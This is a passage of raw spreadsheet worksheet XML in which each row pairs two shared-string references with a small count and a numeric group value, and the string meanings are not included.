    </row>
    <row r="21121" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A21121" t="s">
        <v>16228</v>
      </c>
      <c r="B21121" t="s">
        <v>16217</v>
      </c>
      <c r="C21121">
        <v>5</v>
      </c>
      <c r="D21121">
        <v>5709</v>
      </c>
    </row>
    <row r="21122" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A21122" t="s">
        <v>16223</v>
      </c>
      <c r="B21122" t="s">
        <v>16223</v>
      </c>
      <c r="C21122">
        <v>30</v>
      </c>
      <c r="D21122">
        <v>5709</v>
      </c>
    </row>
    <row r="21123" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A21123" t="s">
        <v>16224</v>
      </c>
      <c r="B21123" t="s">
        <v>16224</v>
      </c>
      <c r="C21123">
        <v>1</v>
      </c>
      <c r="D21123">
        <v>5709</v>
      </c>
    </row>
    <row r="21124" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A21124" t="s">
        <v>16228</v>
      </c>
      <c r="B21124" t="s">
        <v>16211</v>
      </c>
      <c r="C21124">
        <v>0</v>
      </c>
      <c r="D21124">
        <v>1644</v>
      </c>
    </row>
    <row r="21125" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A21125" t="s">
        <v>16231</v>
      </c>
      <c r="B21125" t="s">
        <v>16212</v>
      </c>
      <c r="C21125">
        <v>0</v>
      </c>
      <c r="D21125">
        <v>1644</v>
      </c>
    </row>
    <row r="21126" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A21126" t="s">
        <v>16228</v>
      </c>
      <c r="B21126" t="s">
        <v>16213</v>
      </c>
      <c r="C21126">
        <v>3</v>
      </c>
      <c r="D21126">
        <v>1644</v>
      </c>
    </row>
    <row r="21127" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A21127" t="s">
        <v>16231</v>
      </c>
      <c r="B21127" t="s">
        <v>16214</v>
      </c>
      <c r="C21127">
        <v>0</v>
      </c>
      <c r="D21127">
        <v>1644</v>
      </c>
    </row>
    <row r="21128" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A21128" t="s">
        <v>16228</v>
      </c>
      <c r="B21128" t="s">
        <v>16215</v>
      </c>
      <c r="C21128">
        <v>0</v>
      </c>
      <c r="D21128">
        <v>1644</v>
      </c>
    </row>
    <row r="21129" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A21129" t="s">
        <v>16231</v>
      </c>
      <c r="B21129" t="s">
        <v>16216</v>
      </c>
      <c r="C21129">
        <v>0</v>
      </c>
      <c r="D21129">
        <v>1644</v>
      </c>
    </row>
    <row r="21130" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A21130" t="s">
        <v>16228</v>
      </c>
      <c r="B21130" t="s">
        <v>16217</v>
      </c>
      <c r="C21130">
        <v>0</v>
      </c>
      <c r="D21130">
        <v>1644</v>
      </c>
    </row>
    <row r="21131" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A21131" t="s">
        <v>16231</v>
      </c>
      <c r="B21131" t="s">
        <v>16218</v>
      </c>
      <c r="C21131">
        <v>0</v>
      </c>
      <c r="D21131">
        <v>1644</v>
      </c>
    </row>
    <row r="21132" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A21132" t="s">
        <v>16229</v>
      </c>
      <c r="B21132" t="s">
        <v>16219</v>
      </c>
      <c r="C21132">
        <v>1</v>
      </c>
      <c r="D21132">
        <v>1644</v>
      </c>
    </row>
    <row r="21133" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A21133" t="s">
        <v>16230</v>
      </c>
      <c r="B21133" t="s">
        <v>16220</v>
      </c>
      <c r="C21133">
        <v>0</v>
      </c>
      <c r="D21133">
        <v>1644</v>
      </c>
    </row>
    <row r="21134" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A21134" t="s">
        <v>16229</v>
      </c>
      <c r="B21134" t="s">
        <v>16221</v>
      </c>
      <c r="C21134">
        <v>0</v>
      </c>
      <c r="D21134">
        <v>1644</v>
      </c>
    </row>
    <row r="21135" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A21135" t="s">
        <v>16230</v>
      </c>
      <c r="B21135" t="s">
        <v>16222</v>
      </c>
      <c r="C21135">
        <v>0</v>
      </c>
      <c r="D21135">
        <v>1644</v>
      </c>
    </row>
    <row r="21136" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A21136" t="s">
        <v>16223</v>
      </c>
      <c r="B21136" t="s">
        <v>16223</v>
      </c>
      <c r="C21136">
        <v>0</v>
      </c>
      <c r="D21136">
        <v>1644</v>
      </c>
    </row>
    <row r="21137" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A21137" t="s">
        <v>16224</v>
      </c>
      <c r="B21137" t="s">
        <v>16224</v>
      </c>
      <c r="C21137">
        <v>0</v>
      </c>
      <c r="D21137">
        <v>1644</v>
      </c>
    </row>
    <row r="21138" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A21138" t="s">
        <v>16228</v>
      </c>
      <c r="B21138" t="s">
        <v>16213</v>
      </c>
      <c r="C21138">
        <v>0</v>
      </c>
      <c r="D21138">
        <v>1644</v>
      </c>
    </row>
    <row r="21139" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A21139" t="s">
        <v>16229</v>
      </c>
      <c r="B21139" t="s">
        <v>16221</v>
      </c>
      <c r="C21139">
        <v>3</v>
      </c>
      <c r="D21139">
        <v>1644</v>
      </c>
    </row>
    <row r="21140" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A21140" t="s">
        <v>16223</v>
      </c>
      <c r="B21140" t="s">
        <v>16223</v>
      </c>
      <c r="C21140">
        <v>28</v>
      </c>
      <c r="D21140">
        <v>1644</v>
      </c>
    </row>
    <row r="21141" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A21141" t="s">
        <v>16228</v>
      </c>
      <c r="B21141" t="s">
        <v>16211</v>
      </c>
      <c r="C21141">
        <v>0</v>
      </c>
      <c r="D21141">
        <v>511</v>
      </c>
    </row>
    <row r="21142" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A21142" t="s">
        <v>16231</v>
      </c>
      <c r="B21142" t="s">
        <v>16212</v>
      </c>
      <c r="C21142">
        <v>0</v>
      </c>
      <c r="D21142">
        <v>511</v>
      </c>
    </row>
    <row r="21143" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A21143" t="s">
        <v>16228</v>
      </c>
      <c r="B21143" t="s">
        <v>16213</v>
      </c>
      <c r="C21143">
        <v>5</v>
      </c>
      <c r="D21143">
        <v>511</v>
      </c>
    </row>
    <row r="21144" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A21144" t="s">
        <v>16231</v>
      </c>
      <c r="B21144" t="s">
        <v>16214</v>
      </c>
      <c r="C21144">
        <v>0</v>
      </c>
      <c r="D21144">
        <v>511</v>
      </c>
    </row>
    <row r="21145" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A21145" t="s">
        <v>16228</v>
      </c>
      <c r="B21145" t="s">
        <v>16215</v>
      </c>
      <c r="C21145">
        <v>2</v>
      </c>
      <c r="D21145">
        <v>511</v>
      </c>
    </row>
    <row r="21146" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A21146" t="s">
        <v>16231</v>
      </c>
      <c r="B21146" t="s">
        <v>16216</v>
      </c>
      <c r="C21146">
        <v>2</v>
      </c>
      <c r="D21146">
        <v>511</v>
      </c>
    </row>
    <row r="21147" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A21147" t="s">
        <v>16228</v>
      </c>
      <c r="B21147" t="s">
        <v>16217</v>
      </c>
      <c r="C21147">
        <v>5</v>
      </c>
      <c r="D21147">
        <v>511</v>
      </c>
    </row>
    <row r="21148" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A21148" t="s">
        <v>16231</v>
      </c>
      <c r="B21148" t="s">
        <v>16218</v>
      </c>
      <c r="C21148">
        <v>0</v>
      </c>
      <c r="D21148">
        <v>511</v>
      </c>
    </row>
    <row r="21149" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A21149" t="s">
        <v>16229</v>
      </c>
      <c r="B21149" t="s">
        <v>16219</v>
      </c>
      <c r="C21149">
        <v>0</v>
      </c>
      <c r="D21149">
        <v>511</v>
      </c>
    </row>
    <row r="21150" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A21150" t="s">
        <v>16230</v>
      </c>
      <c r="B21150" t="s">
        <v>16220</v>
      </c>
      <c r="C21150">
        <v>0</v>
      </c>
      <c r="D21150">
        <v>511</v>
      </c>
    </row>
    <row r="21151" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A21151" t="s">
        <v>16229</v>
      </c>
      <c r="B21151" t="s">
        <v>16221</v>
      </c>
      <c r="C21151">
        <v>4</v>
      </c>
      <c r="D21151">
        <v>511</v>
      </c>
    </row>
    <row r="21152" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A21152" t="s">
        <v>16230</v>
      </c>
      <c r="B21152" t="s">
        <v>16222</v>
      </c>
      <c r="C21152">
        <v>0</v>
      </c>
      <c r="D21152">
        <v>511</v>
      </c>
    </row>
    <row r="21153" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A21153" t="s">
        <v>16223</v>
      </c>
      <c r="B21153" t="s">
        <v>16223</v>
      </c>
      <c r="C21153">
        <v>26</v>
      </c>
      <c r="D21153">
        <v>511</v>
      </c>
    </row>
    <row r="21154" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A21154" t="s">
        <v>16224</v>
      </c>
      <c r="B21154" t="s">
        <v>16224</v>
      </c>
      <c r="C21154">
        <v>1</v>
      </c>
      <c r="D21154">
        <v>511</v>
      </c>
    </row>
    <row r="21155" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A21155" t="s">
        <v>16228</v>
      </c>
      <c r="B21155" t="s">
        <v>16211</v>
      </c>
      <c r="C21155">
        <v>0</v>
      </c>
      <c r="D21155">
        <v>128</v>
      </c>
    </row>
    <row r="21156" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A21156" t="s">
        <v>16231</v>
      </c>
      <c r="B21156" t="s">
        <v>16212</v>
      </c>
      <c r="C21156">
        <v>0</v>
      </c>
      <c r="D21156">
        <v>128</v>
      </c>
    </row>
    <row r="21157" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A21157" t="s">
        <v>16228</v>
      </c>
      <c r="B21157" t="s">
        <v>16213</v>
      </c>
      <c r="C21157">
        <v>0</v>
      </c>
      <c r="D21157">
        <v>128</v>
      </c>
    </row>
    <row r="21158" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A21158" t="s">
        <v>16231</v>
      </c>
      <c r="B21158" t="s">
        <v>16214</v>
      </c>
      <c r="C21158">
        <v>0</v>
      </c>
      <c r="D21158">
        <v>128</v>
      </c>
    </row>
    <row r="21159" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A21159" t="s">
        <v>16228</v>
      </c>
      <c r="B21159" t="s">
        <v>16215</v>
      </c>
      <c r="C21159">
        <v>2</v>
      </c>
      <c r="D21159">
        <v>128</v>
      </c>
    </row>
    <row r="21160" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A21160" t="s">
        <v>16231</v>
      </c>
      <c r="B21160" t="s">
        <v>16216</v>
      </c>
      <c r="C21160">
        <v>1</v>
      </c>
      <c r="D21160">
        <v>128</v>
      </c>
    </row>
    <row r="21161" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A21161" t="s">
        <v>16228</v>
      </c>
      <c r="B21161" t="s">
        <v>16217</v>
      </c>
      <c r="C21161">
        <v>20</v>
      </c>
      <c r="D21161">
        <v>128</v>
      </c>
    </row>
    <row r="21162" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A21162" t="s">
        <v>16231</v>
      </c>
      <c r="B21162" t="s">
        <v>16218</v>
      </c>
      <c r="C21162">
        <v>0</v>
      </c>
      <c r="D21162">
        <v>128</v>
      </c>
    </row>
    <row r="21163" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A21163" t="s">
        <v>16229</v>
      </c>
      <c r="B21163" t="s">
        <v>16219</v>
      </c>
      <c r="C21163">
        <v>0</v>
      </c>
      <c r="D21163">
        <v>128</v>
      </c>
    </row>
    <row r="21164" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A21164" t="s">
        <v>16230</v>
      </c>
      <c r="B21164" t="s">
        <v>16220</v>
      </c>
      <c r="C21164">
        <v>0</v>
      </c>
      <c r="D21164">
        <v>128</v>
      </c>
    </row>
    <row r="21165" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A21165" t="s">
        <v>16229</v>
      </c>
      <c r="B21165" t="s">
        <v>16221</v>
      </c>
      <c r="C21165">
        <v>20</v>
      </c>
      <c r="D21165">
        <v>128</v>
      </c>
    </row>
    <row r="21166" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A21166" t="s">
        <v>16230</v>
      </c>
      <c r="B21166" t="s">
        <v>16222</v>
      </c>
      <c r="C21166">
        <v>0</v>
      </c>
      <c r="D21166">
        <v>128</v>
      </c>
    </row>
    <row r="21167" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A21167" t="s">
        <v>16223</v>
      </c>
      <c r="B21167" t="s">
        <v>16223</v>
      </c>
      <c r="C21167">
        <v>26</v>
      </c>
      <c r="D21167">
        <v>128</v>
      </c>
    </row>
    <row r="21168" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A21168" t="s">
        <v>16224</v>
      </c>
      <c r="B21168" t="s">
        <v>16224</v>
      </c>
      <c r="C21168">
        <v>1</v>
      </c>
      <c r="D21168">
        <v>128</v>
      </c>
    </row>
    <row r="21169" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A21169" t="s">
        <v>16228</v>
      </c>
      <c r="B21169" t="s">
        <v>16211</v>
      </c>
      <c r="C21169">
        <v>0</v>
      </c>
      <c r="D21169">
        <v>715</v>
      </c>
    </row>
    <row r="21170" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A21170" t="s">
        <v>16231</v>
      </c>
      <c r="B21170" t="s">
        <v>16212</v>
      </c>
      <c r="C21170">
        <v>1</v>
      </c>
      <c r="D21170">
        <v>715</v>
      </c>
    </row>
    <row r="21171" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A21171" t="s">
        <v>16228</v>
      </c>
      <c r="B21171" t="s">
        <v>16213</v>
      </c>
      <c r="C21171">
        <v>2</v>
      </c>
      <c r="D21171">
        <v>715</v>
      </c>
    </row>
    <row r="21172" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A21172" t="s">
        <v>16231</v>
      </c>
      <c r="B21172" t="s">
        <v>16214</v>
      </c>
      <c r="C21172">
        <v>1</v>
      </c>
      <c r="D21172">
        <v>715</v>
      </c>
    </row>
    <row r="21173" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A21173" t="s">
        <v>16228</v>
      </c>
      <c r="B21173" t="s">
        <v>16215</v>
      </c>
      <c r="C21173">
        <v>0</v>
      </c>
      <c r="D21173">
        <v>715</v>
      </c>
    </row>
    <row r="21174" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A21174" t="s">
        <v>16231</v>
      </c>
      <c r="B21174" t="s">
        <v>16216</v>
      </c>
      <c r="C21174">
        <v>1</v>
      </c>
      <c r="D21174">
        <v>715</v>
      </c>
    </row>
    <row r="21175" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A21175" t="s">
        <v>16228</v>
      </c>
      <c r="B21175" t="s">
        <v>16217</v>
      </c>
      <c r="C21175">
        <v>1</v>
      </c>
      <c r="D21175">
        <v>715</v>
      </c>
    </row>
    <row r="21176" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A21176" t="s">
        <v>16231</v>
      </c>
      <c r="B21176" t="s">
        <v>16218</v>
      </c>
      <c r="C21176">
        <v>0</v>
      </c>
      <c r="D21176">
        <v>715</v>
      </c>
    </row>
    <row r="21177" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A21177" t="s">
        <v>16229</v>
      </c>
      <c r="B21177" t="s">
        <v>16219</v>
      </c>
      <c r="C21177">
        <v>0</v>
      </c>
      <c r="D21177">
        <v>715</v>
      </c>
    </row>
    <row r="21178" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A21178" t="s">
        <v>16230</v>
      </c>
      <c r="B21178" t="s">
        <v>16220</v>
      </c>
      <c r="C21178">
        <v>0</v>
      </c>
      <c r="D21178">
        <v>715</v>
      </c>
    </row>
    <row r="21179" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A21179" t="s">
        <v>16229</v>
      </c>
      <c r="B21179" t="s">
        <v>16221</v>
      </c>
      <c r="C21179">
        <v>1</v>
      </c>
      <c r="D21179">
        <v>715</v>
      </c>
    </row>
    <row r="21180" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A21180" t="s">
        <v>16230</v>
      </c>
      <c r="B21180" t="s">
        <v>16222</v>
      </c>
      <c r="C21180">
        <v>1</v>
      </c>
      <c r="D21180">
        <v>715</v>
      </c>
    </row>
    <row r="21181" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A21181" t="s">
        <v>16223</v>
      </c>
      <c r="B21181" t="s">
        <v>16223</v>
      </c>
      <c r="C21181">
        <v>24</v>
      </c>
      <c r="D21181">
        <v>715</v>
      </c>
    </row>
    <row r="21182" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A21182" t="s">
        <v>16224</v>
      </c>
      <c r="B21182" t="s">
        <v>16224</v>
      </c>
      <c r="C21182">
        <v>1</v>
      </c>
      <c r="D21182">
        <v>715</v>
      </c>
    </row>
    <row r="21183" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A21183" t="s">
        <v>16228</v>
      </c>
      <c r="B21183" t="s">
        <v>16217</v>
      </c>
      <c r="C21183">
        <v>3</v>
      </c>
      <c r="D21183">
        <v>550</v>
      </c>
    </row>
    <row r="21184" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A21184" t="s">
        <v>16231</v>
      </c>
      <c r="B21184" t="s">
        <v>16218</v>
      </c>
      <c r="C21184">
        <v>4</v>
      </c>
      <c r="D21184">
        <v>550</v>
      </c>
    </row>
    <row r="21185" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A21185" t="s">
        <v>16230</v>
      </c>
      <c r="B21185" t="s">
        <v>16220</v>
      </c>
      <c r="C21185">
        <v>1</v>
      </c>
      <c r="D21185">
        <v>550</v>
      </c>
    </row>
    <row r="21186" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A21186" t="s">
        <v>16229</v>
      </c>
      <c r="B21186" t="s">
        <v>16221</v>
      </c>
      <c r="C21186">
        <v>5</v>
      </c>
      <c r="D21186">
        <v>550</v>
      </c>
    </row>
    <row r="21187" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A21187" t="s">
        <v>16230</v>
      </c>
      <c r="B21187" t="s">
        <v>16222</v>
      </c>
      <c r="C21187">
        <v>9</v>
      </c>
      <c r="D21187">
        <v>550</v>
      </c>
    </row>
    <row r="21188" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A21188" t="s">
        <v>16228</v>
      </c>
      <c r="B21188" t="s">
        <v>16211</v>
      </c>
      <c r="C21188">
        <v>0</v>
      </c>
      <c r="D21188">
        <v>1860</v>
      </c>
    </row>
    <row r="21189" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A21189" t="s">
        <v>16231</v>
      </c>
      <c r="B21189" t="s">
        <v>16212</v>
      </c>
      <c r="C21189">
        <v>0</v>
      </c>
      <c r="D21189">
        <v>1860</v>
      </c>
    </row>
    <row r="21190" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A21190" t="s">
        <v>16228</v>
      </c>
      <c r="B21190" t="s">
        <v>16213</v>
      </c>
      <c r="C21190">
        <v>0</v>
      </c>
      <c r="D21190">
        <v>1860</v>
      </c>
    </row>
    <row r="21191" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A21191" t="s">
        <v>16231</v>
      </c>
      <c r="B21191" t="s">
        <v>16214</v>
      </c>
      <c r="C21191">
        <v>0</v>
      </c>
      <c r="D21191">
        <v>1860</v>
      </c>
    </row>
    <row r="21192" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A21192" t="s">
        <v>16228</v>
      </c>
      <c r="B21192" t="s">
        <v>16215</v>
      </c>
      <c r="C21192">
        <v>1</v>
      </c>
      <c r="D21192">
        <v>1860</v>
      </c>
    </row>
    <row r="21193" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A21193" t="s">
        <v>16231</v>
      </c>
      <c r="B21193" t="s">
        <v>16216</v>
      </c>
      <c r="C21193">
        <v>0</v>
      </c>
      <c r="D21193">
        <v>1860</v>
      </c>
    </row>
    <row r="21194" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A21194" t="s">
        <v>16228</v>
      </c>
      <c r="B21194" t="s">
        <v>16217</v>
      </c>
      <c r="C21194">
        <v>4</v>
      </c>
      <c r="D21194">
        <v>1860</v>
      </c>
    </row>
    <row r="21195" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A21195" t="s">
        <v>16231</v>
      </c>
      <c r="B21195" t="s">
        <v>16218</v>
      </c>
      <c r="C21195">
        <v>6</v>
      </c>
      <c r="D21195">
        <v>1860</v>
      </c>
    </row>
    <row r="21196" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A21196" t="s">
        <v>16229</v>
      </c>
      <c r="B21196" t="s">
        <v>16219</v>
      </c>
      <c r="C21196">
        <v>0</v>
      </c>
      <c r="D21196">
        <v>1860</v>
      </c>
    </row>
    <row r="21197" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A21197" t="s">
        <v>16230</v>
      </c>
      <c r="B21197" t="s">
        <v>16220</v>
      </c>
      <c r="C21197">
        <v>0</v>
      </c>
      <c r="D21197">
        <v>1860</v>
      </c>
    </row>
    <row r="21198" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A21198" t="s">
        <v>16229</v>
      </c>
      <c r="B21198" t="s">
        <v>16221</v>
      </c>
      <c r="C21198">
        <v>0</v>
      </c>
      <c r="D21198">
        <v>1860</v>
      </c>
    </row>
    <row r="21199" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A21199" t="s">
        <v>16230</v>
      </c>
      <c r="B21199" t="s">
        <v>16222</v>
      </c>
      <c r="C21199">
        <v>0</v>
      </c>
      <c r="D21199">
        <v>1860</v>
      </c>
    </row>
    <row r="21200" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A21200" t="s">
        <v>16223</v>
      </c>
      <c r="B21200" t="s">
        <v>16223</v>
      </c>
      <c r="C21200">
        <v>7</v>
      </c>
      <c r="D21200">
        <v>1860</v>
      </c>
    </row>
    <row r="21201" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A21201" t="s">
        <v>16224</v>
      </c>
      <c r="B21201" t="s">
        <v>16224</v>
      </c>
      <c r="C21201">
        <v>7</v>
      </c>
      <c r="D21201">
        <v>1860</v>
      </c>
    </row>
    <row r="21202" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A21202" t="s">
        <v>16231</v>
      </c>
      <c r="B21202" t="s">
        <v>16216</v>
      </c>
      <c r="C21202">
        <v>3</v>
      </c>
      <c r="D21202">
        <v>210</v>
      </c>
    </row>
    <row r="21203" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A21203" t="s">
        <v>16228</v>
      </c>
      <c r="B21203" t="s">
        <v>16217</v>
      </c>
      <c r="C21203">
        <v>2</v>
      </c>
      <c r="D21203">
        <v>210</v>
      </c>
    </row>
    <row r="21204" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A21204" t="s">
        <v>16228</v>
      </c>
      <c r="B21204" t="s">
        <v>16211</v>
      </c>
      <c r="C21204">
        <v>0</v>
      </c>
      <c r="D21204">
        <v>1583</v>
      </c>
    </row>
    <row r="21205" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A21205" t="s">
        <v>16231</v>
      </c>
      <c r="B21205" t="s">
        <v>16212</v>
      </c>
      <c r="C21205">
        <v>0</v>
      </c>
      <c r="D21205">
        <v>1583</v>
      </c>
    </row>
    <row r="21206" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A21206" t="s">
        <v>16228</v>
      </c>
      <c r="B21206" t="s">
        <v>16213</v>
      </c>
      <c r="C21206">
        <v>0</v>
      </c>
      <c r="D21206">
        <v>1583</v>
      </c>
    </row>
    <row r="21207" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A21207" t="s">
        <v>16231</v>
      </c>
      <c r="B21207" t="s">
        <v>16214</v>
      </c>
      <c r="C21207">
        <v>0</v>
      </c>
      <c r="D21207">
        <v>1583</v>
      </c>
    </row>
    <row r="21208" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A21208" t="s">
        <v>16228</v>
      </c>
      <c r="B21208" t="s">
        <v>16215</v>
      </c>
      <c r="C21208">
        <v>0</v>
      </c>
      <c r="D21208">
        <v>1583</v>
      </c>
    </row>
    <row r="21209" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A21209" t="s">
        <v>16231</v>
      </c>
      <c r="B21209" t="s">
        <v>16216</v>
      </c>
      <c r="C21209">
        <v>3</v>
      </c>
      <c r="D21209">
        <v>1583</v>
      </c>
    </row>
    <row r="21210" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A21210" t="s">
        <v>16228</v>
      </c>
      <c r="B21210" t="s">
        <v>16217</v>
      </c>
      <c r="C21210">
        <v>10</v>
      </c>
      <c r="D21210">
        <v>1583</v>
      </c>
    </row>
    <row r="21211" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A21211" t="s">
        <v>16231</v>
      </c>
      <c r="B21211" t="s">
        <v>16218</v>
      </c>
      <c r="C21211">
        <v>3</v>
      </c>
      <c r="D21211">
        <v>1583</v>
      </c>
    </row>
    <row r="21212" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A21212" t="s">
        <v>16229</v>
      </c>
      <c r="B21212" t="s">
        <v>16219</v>
      </c>
      <c r="C21212">
        <v>0</v>
      </c>
      <c r="D21212">
        <v>1583</v>
      </c>
    </row>
    <row r="21213" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A21213" t="s">
        <v>16230</v>
      </c>
      <c r="B21213" t="s">
        <v>16220</v>
      </c>
      <c r="C21213">
        <v>0</v>
      </c>
      <c r="D21213">
        <v>1583</v>
      </c>
    </row>
    <row r="21214" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A21214" t="s">
        <v>16229</v>
      </c>
      <c r="B21214" t="s">
        <v>16221</v>
      </c>
      <c r="C21214">
        <v>11</v>
      </c>
      <c r="D21214">
        <v>1583</v>
      </c>
    </row>
    <row r="21215" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A21215" t="s">
        <v>16230</v>
      </c>
      <c r="B21215" t="s">
        <v>16222</v>
      </c>
      <c r="C21215">
        <v>10</v>
      </c>
      <c r="D21215">
        <v>1583</v>
      </c>
    </row>
    <row r="21216" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A21216" t="s">
        <v>16223</v>
      </c>
      <c r="B21216" t="s">
        <v>16223</v>
      </c>
      <c r="C21216">
        <v>30</v>
      </c>
      <c r="D21216">
        <v>1583</v>
      </c>
    </row>
    <row r="21217" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A21217" t="s">
        <v>16224</v>
      </c>
      <c r="B21217" t="s">
        <v>16224</v>
      </c>
      <c r="C21217">
        <v>1</v>
      </c>
      <c r="D21217">
        <v>1583</v>
      </c>
    </row>
    <row r="21218" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A21218" t="s">
        <v>16229</v>
      </c>
      <c r="B21218" t="s">
        <v>16219</v>
      </c>
      <c r="C21218">
        <v>0</v>
      </c>
      <c r="D21218">
        <v>210</v>
      </c>
    </row>
    <row r="21219" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A21219" t="s">
        <v>16230</v>
      </c>
      <c r="B21219" t="s">
        <v>16220</v>
      </c>
      <c r="C21219">
        <v>0</v>
      </c>
      <c r="D21219">
        <v>210</v>
      </c>
    </row>
    <row r="21220" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A21220" t="s">
        <v>16229</v>
      </c>
      <c r="B21220" t="s">
        <v>16221</v>
      </c>
      <c r="C21220">
        <v>33</v>
      </c>
      <c r="D21220">
        <v>210</v>
      </c>
    </row>
    <row r="21221" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A21221" t="s">
        <v>16228</v>
      </c>
      <c r="B21221" t="s">
        <v>16211</v>
      </c>
      <c r="C21221">
        <v>0</v>
      </c>
      <c r="D21221">
        <v>5448</v>
      </c>
    </row>
    <row r="21222" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A21222" t="s">
        <v>16231</v>
      </c>
      <c r="B21222" t="s">
        <v>16212</v>
      </c>
      <c r="C21222">
        <v>0</v>
      </c>
      <c r="D21222">
        <v>5448</v>
      </c>
    </row>
    <row r="21223" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A21223" t="s">
        <v>16228</v>
      </c>
      <c r="B21223" t="s">
        <v>16213</v>
      </c>
      <c r="C21223">
        <v>0</v>
      </c>
      <c r="D21223">
        <v>5448</v>
      </c>
    </row>
    <row r="21224" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A21224" t="s">
        <v>16231</v>
      </c>
      <c r="B21224" t="s">
        <v>16214</v>
      </c>
      <c r="C21224">
        <v>0</v>
      </c>
      <c r="D21224">
        <v>5448</v>
      </c>
    </row>
    <row r="21225" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A21225" t="s">
        <v>16228</v>
      </c>
      <c r="B21225" t="s">
        <v>16215</v>
      </c>
      <c r="C21225">
        <v>0</v>
      </c>
      <c r="D21225">
        <v>5448</v>
      </c>
    </row>
    <row r="21226" spans="1:4" x14ac:dyDescent="0.2">
